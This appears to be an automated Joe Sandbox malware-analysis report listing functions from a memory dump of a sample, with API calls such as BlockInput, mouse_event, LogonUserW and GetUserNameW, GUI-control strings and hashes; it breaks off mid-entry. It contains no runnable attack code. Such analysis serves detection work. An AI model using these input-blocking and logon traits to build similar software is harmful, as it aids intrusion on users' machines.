Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction ID: 4474e3e82796cc78bea31e764e68234c2189cff7cab07738f4d3066313ef9d62
Opcode Fuzzy Hash: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction Fuzzy Hash: B7B0923105420AEBCA106B91EC09BA83F78EB44AA2F404030F60D86060CF6254528A99

Function 00ACF419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction ID: 2da5c1345dc9d05a479058585614a8c7ef496a4221149218b8e05fa58f9dc1ad
Opcode Fuzzy Hash: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction Fuzzy Hash: D9322671D69F454DD7239634D83233AA259AFB73C4F26D73BE819B69A6EF28C4834100

Function 00AD267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction ID: e12f3f890b9a32ca222e64a0317a2c8f4825d78c38d880e1e71be4cba9880ef3
Opcode Fuzzy Hash: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction Fuzzy Hash: 8DB1F221D2AF414DD3239639883133AB65CAFBB2C5F61D71BFC5671E62EB2185834241

Function 00B08B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B08B25

Part of subcall function 00AC543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B091F8,00000000,?,?,?,?,00B093A9,00000000,?), ref: 00AC5443
Part of subcall function 00AC543A: __aulldiv.LIBCMT ref: 00AC5463

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: e95948538e3f5a615509324bb74b609a53ceffbf527f90f6d90ff94f302fa309
Instruction ID: 69a9f27c09b9c42561b995e196b0f8cddb33ddff65c5ac27783b9234133ca915
Opcode Fuzzy Hash: e95948538e3f5a615509324bb74b609a53ceffbf527f90f6d90ff94f302fa309
Instruction Fuzzy Hash: 8A21E7726355108BC329CF25D441B52B7E1EBA5321B288EACD0E6CB2D0CE75B945CB94

Function 00B141FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00B14218

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 72c222a8cfac91525e197db19fd417ce5f767e65f226fec0064e201d7dc194bb
Instruction ID: 8711cfa53ee2d6ef48465a0535c86333f6d0a7b5693596a890f23ba92843be3e
Opcode Fuzzy Hash: 72c222a8cfac91525e197db19fd417ce5f767e65f226fec0064e201d7dc194bb
Instruction Fuzzy Hash: F7E01A312502149FC720AF59D844A9AB7E8EF997A0F008066F849C7262DBB0A8818BA0

Function 00B04EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B04F18

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 0d4904aa164854c1c4a09c2af4dba6a6c520ff619d4c3d262ee0f2b5da7869f1
Instruction ID: f081f652229110035beea9186e988db77db68cf532e1b8d53a5395d8450f1af7
Opcode Fuzzy Hash: 0d4904aa164854c1c4a09c2af4dba6a6c520ff619d4c3d262ee0f2b5da7869f1
Instruction Fuzzy Hash: 6ED05EF016420738FC284B20AC0FF760988E341781F8449C93309C54E19EE5A890A034

Function 00AF8C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF88D1), ref: 00AF8CB3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction ID: 1a49a1affef8b40099f36160c720e83c957f38a4275a7c070a2c6635103a0ee2
Opcode Fuzzy Hash: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction Fuzzy Hash: 8FD05E3226050EABEF018EA4DD01EBF3B69EB04B01F408121FE15D60A1C775D835AB60

Function 00AE2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00AE2242

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9b01268286120ddf0d9c3c7e3143de4ce070ce765a27540bfbadbec2d2a48286
Instruction ID: 4eea734f9fb80fc279f5d6f006beb0a656a82c538a1494d2e99367194c7fb7ca
Opcode Fuzzy Hash: 9b01268286120ddf0d9c3c7e3143de4ce070ce765a27540bfbadbec2d2a48286
Instruction Fuzzy Hash: FAC048F180011ADBEB15DFA0DA88DFFB7BCAB08304F2040A6A102F2100EB789B448A71

Function 00ACA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA36A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction ID: 378a82cade6a0532b3617b5a30313cdb83e2322770c2fb91f478cdb2c2821fe6
Opcode Fuzzy Hash: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction Fuzzy Hash: 91A0123000010DE78A001B41EC044547F6CD6001907004030F40C410218B3254114584

Function 00AB8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14fc5097fb9b3a73f24eac01ca6fc1222925827963709ccdcb426e845a5ca026
Instruction ID: 3b5f76c5bac65d5813ea5fd5cf141ce4fcabd579f2a2c0677f34784782a523ba
Opcode Fuzzy Hash: 14fc5097fb9b3a73f24eac01ca6fc1222925827963709ccdcb426e845a5ca026
Instruction Fuzzy Hash: 02222B70A05619DBCF288B7CC4946BD7BBDEB02344F28446AE6528B593DB3CDD81DB90

Function 00AC2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 1c0590a22c36db8ae0089b57fe10d7e72b56c29260db7e70d8329878ae84f720
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: F2C16E322051930ADF2D87399474B3EBAE15AA27B131B076EE4B3DB5C5EF20D525E720

Function 00AC283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 8c61f2ceaed06827727afa99839bbf247a4ff855f12fd3ae414978f07dae4a2d
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 1FC1703220919309DB6D473A8434B3EBAE15AA37B131B076EE4B2DB5D5EF20D535A720

Function 00AC1BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 7b90a1fb2eabed22c3907786b196aef33ef025423f8ea83a59b175f660b0f846
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: AAC1713230919309DF2D473A9434A3EBAE15AA37B131B076EE4B3CB5C6EF20D5359660

Function 00B237F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B2F910), ref: 00B238AF
IsWindowVisible.USER32(?), ref: 00B238D3

Strings

ISVISIBLE, xrefs: 00B238BF
SHOWDROPDOWN, xrefs: 00B23968
SELECTSTRING, xrefs: 00B23A8E
CURRENTTAB, xrefs: 00B23945
EDITPASTE, xrefs: 00B23BE7
CHECK, xrefs: 00B23AF5
UNCHECK, xrefs: 00B23B0B
SETCURRENTSELECTION, xrefs: 00B23A3E
GETLINECOUNT, xrefs: 00B23B4E
SENDCOMMANDID, xrefs: 00B23C62
ISENABLED, xrefs: 00B238F3
DELSTRING, xrefs: 00B239D1
ISCHECKED, xrefs: 00B23AC1
ADDSTRING, xrefs: 00B2399E
HIDEDROPDOWN, xrefs: 00B23988
TABLEFT, xrefs: 00B2390F
GETCURRENTSELECTION, xrefs: 00B23A6B
GETCURRENTLINE, xrefs: 00B23B75
TABRIGHT, xrefs: 00B23925
GETLINE, xrefs: 00B23C23
FINDSTRING, xrefs: 00B239FE
GETCURRENTCOL, xrefs: 00B23BB0
GETSELECTED, xrefs: 00B23B2B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 39e9a037ecb798c6f0123170646d4680258b99109a07031d4ec384e884eb47df
Instruction ID: 8ecab24780424ab602edaea18ca30a61d722341d8fba73aafebaa38475a46df0
Opcode Fuzzy Hash: 39e9a037ecb798c6f0123170646d4680258b99109a07031d4ec384e884eb47df
Instruction Fuzzy Hash: DBD17E30204315DFCB14EF10D691F6AB7E5EF95B44F1148ACB88A5B3A2CB25EE4ACB41

Function 00B2A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B2A89F
GetSysColorBrush.USER32(0000000F), ref: 00B2A8D0
GetSysColor.USER32(0000000F), ref: 00B2A8DC
SetBkColor.GDI32(?,000000FF), ref: 00B2A8F6
SelectObject.GDI32(?,?), ref: 00B2A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00B2A930
GetSysColor.USER32(00000010), ref: 00B2A938
CreateSolidBrush.GDI32(00000000), ref: 00B2A93F
FrameRect.USER32(?,?,00000000), ref: 00B2A94E
DeleteObject.GDI32(00000000), ref: 00B2A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00B2A9A0
FillRect.USER32(?,?,?), ref: 00B2A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00B2A9FD

Part of subcall function 00B2AB60: GetSysColor.USER32(00000012), ref: 00B2AB99
Part of subcall function 00B2AB60: SetTextColor.GDI32(?,?), ref: 00B2AB9D
Part of subcall function 00B2AB60: GetSysColorBrush.USER32(0000000F), ref: 00B2ABB3
Part of subcall function 00B2AB60: GetSysColor.USER32(0000000F), ref: 00B2ABBE
Part of subcall function 00B2AB60: GetSysColor.USER32(00000011), ref: 00B2ABDB
Part of subcall function 00B2AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B2ABE9
Part of subcall function 00B2AB60: SelectObject.GDI32(?,00000000), ref: 00B2ABFA
Part of subcall function 00B2AB60: SetBkColor.GDI32(?,00000000), ref: 00B2AC03
Part of subcall function 00B2AB60: SelectObject.GDI32(?,?), ref: 00B2AC10
Part of subcall function 00B2AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B2AC2F
Part of subcall function 00B2AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B2AC46
Part of subcall function 00B2AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B2AC5B

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: dfdc6b4a10e0f5465f578a530de374857d88fb2f1c52ae14f55507b192ee8105
Instruction ID: 0f5c80e6e67e808527cf7e060bc7d2f2cfa448373b8ddbf651776cdcc07170cf
Opcode Fuzzy Hash: dfdc6b4a10e0f5465f578a530de374857d88fb2f1c52ae14f55507b192ee8105
Instruction Fuzzy Hash: B6A18C72408312AFD7209F64DC48E6B7BF9FF89321F104A29F966971A1DB34D846CB52

Function 00AA2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00AA2CA2
DeleteObject.GDI32(00000000), ref: 00AA2CE8
DeleteObject.GDI32(00000000), ref: 00AA2CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00AA2CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00AA2D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00ADC68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ADC6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ADCAED

Part of subcall function 00AA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2036,?,00000000,?,?,?,?,00AA16CB,00000000,?), ref: 00AA1B9A

SendMessageW.USER32(?,00001053), ref: 00ADCB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ADCB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ADCB62

Strings

0, xrefs: 00ADC981

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b2e17c43deb37d81f0d9722364048c65b9c8cb0167164138de8d843d9ddbbeea
Instruction ID: 4e2b1b76d3d0ec5405b4496eb6b7198d49d9130bf3133fe61a63fe0a0511f6b6
